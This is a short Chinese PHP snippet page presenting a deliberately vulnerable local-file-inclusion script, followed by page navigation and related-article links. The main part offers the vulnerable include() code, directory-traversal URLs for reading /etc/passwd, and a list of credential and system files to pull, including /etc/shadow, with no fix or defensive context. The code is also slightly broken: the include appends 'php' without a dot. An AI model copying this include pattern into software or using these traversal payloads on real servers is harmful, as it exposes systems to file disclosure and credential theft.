php 伪造本地文件包含漏洞的代码

yipeiwu_com5年前 (2020-03-06)PHP代码库

代码:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

返回列表

上一篇：Python字符转换

下一篇：PHP生成静态页面详解

PHP显示今天、今月、上月、今年的起点/终点时间戳的代码

$t = time(); $t1 = mktime(0,0,0,date(“m”,$t),date(“d”,$t),date(“Y”,$t)); $t2 = mktime(0,0,0,d...

php写app用的框架整理

PHP开发app常用的三种框架介绍 1、ThinkPHP框架 TP框架是一共快速兼容简单的轻量级国产PHP开发框架，使用面向对象的结构和MVC模式进行开发。它可以支持Windows、Li...

PHP基于迭代实现文件夹复制、删除、查看大小等操作的方法

本文实例讲述了PHP基于迭代实现文件夹复制、删除、查看大小等操作的方法。分享给大家供大家参考，具体如下：前面一篇 PHP递归实现文件夹的复制、删除、查看大小操作分析了递归操作使用技巧...

php获取本周开始日期和结束日期的方法

本文实例讲述了php获取本周开始日期和结束日期的方法。分享给大家供大家参考。具体如下：复制代码代码如下://当前日期 $sdefaultDate = date("Y-m...

php 策略模式原理与应用深入理解

本文实例讲述了php 策略模式原理与应用。分享给大家供大家参考，具体如下：策略模式简单理解就是有n个做法供你选择，根据你的需要选择某个策略得到结果就应用场景来说：例1：比如购买...

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

PHP显示今天、今月、上月、今年的起点/终点时间戳的代码

php写app用的框架整理

PHP基于迭代实现文件夹复制、删除、查看大小等操作的方法

php获取本周开始日期和结束日期的方法

php 策略模式原理与应用深入理解

© YiPeiWu.com 【宜配屋】粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

PHP显示今天、今月、上月、今年的起点/终点时间戳的代码

php写app用的框架整理

PHP基于迭代实现文件夹复制、删除、查看大小等操作的方法

php获取本周开始日期和结束日期的方法

php 策略模式原理与应用深入理解

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号 var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8aa60ae04b767b2af31903508928acc0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

© YiPeiWu.com 【宜配屋】粤ICP备17031333号